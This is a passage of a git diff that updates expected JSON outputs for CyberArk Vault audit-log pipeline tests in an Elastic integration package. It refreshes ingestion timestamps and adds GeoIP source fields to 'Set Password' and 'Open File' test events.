"ingested": "2021-12-09T13:37:13.320167Z", + "ingested": "2021-12-14T14:42:42.969873937Z", "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -551,6 +584,11 @@ "67.43.156.14" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -567,28 +605,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320171500Z", + "ingested": "2021-12-14T14:42:42.969874333Z", "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -604,6 +646,11 @@ "67.43.156.14" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -620,28 +667,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320176600Z", + "ingested": "2021-12-14T14:42:42.969874942Z", "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -657,6 +708,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -674,28 +730,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320180600Z", + "ingested": "2021-12-14T14:42:42.969875362Z", "original": "\u003c5\u003e1 2021-03-11T16:59:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:54\",\"IsoTimestamp\":\"2021-03-11T16:59:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -711,6 +771,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -728,28 +793,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320185600Z", + "ingested": "2021-12-14T14:42:42.969875766Z", "original": "\u003c5\u003e1 2021-03-11T16:59:55Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:55\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:55Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:55\",\"IsoTimestamp\":\"2021-03-11T16:59:55Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -765,6 +834,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -782,28 +856,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320191300Z", + "ingested": "2021-12-14T14:42:42.969876147Z", "original": "\u003c5\u003e1 2021-03-11T20:10:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:10:33\",\"IsoTimestamp\":\"2021-03-11T20:10:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -819,6 +897,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -836,28 +919,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320197Z", + "ingested": "2021-12-14T14:42:42.969876547Z", "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_SSH\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -873,6 +960,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -890,28 +982,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320203Z", + "ingested": "2021-12-14T14:42:42.969877047Z", "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -927,6 +1023,11 @@ "67.43.156.15" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -944,14 +1045,30 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", + "ip": "67.43.156.15" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320208600Z", + "ingested": "2021-12-14T14:42:42.969877437Z", "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json index 56d1d0b1fb3..c813b54d4e4 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-12-09T13:37:14.711383300Z", + "ingested": "2021-12-14T14:42:44.721462587Z", "original": "\u003c5\u003e1 2021-03-08T18:24:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:50\",\"IsoTimestamp\":\"2021-03-08T18:24:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAPrivateUserPrefs\",\"File\":\"Root\\\\YWRtaW5pc3RyYXRvcg==\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", "code": "98", "kind": "event" @@ -65,6 +65,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -110,7 +119,7 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-12-09T13:37:14.711392300Z", + "ingested": "2021-12-14T14:42:44.721465024Z", "original": "\u003c5\u003e1 2021-03-10T18:44:08Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:44:08\",\"IsoTimestamp\":\"2021-03-10T18:44:08Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", "code": "98", "kind": "event" @@ -123,6 +132,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -168,7 +186,7 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-12-09T13:37:14.711398Z", + "ingested": "2021-12-14T14:42:44.721465474Z", "original": "\u003c5\u003e1 2021-03-10T22:17:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:40\",\"IsoTimestamp\":\"2021-03-10T22:17:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", "code": "98", "kind": "event" @@ -236,7 +254,7 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-12-09T13:37:14.711403400Z", + "ingested": "2021-12-14T14:42:44.721465847Z", "original": "\u003c5\u003e1 2021-03-11T19:45:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:45:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:45:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n 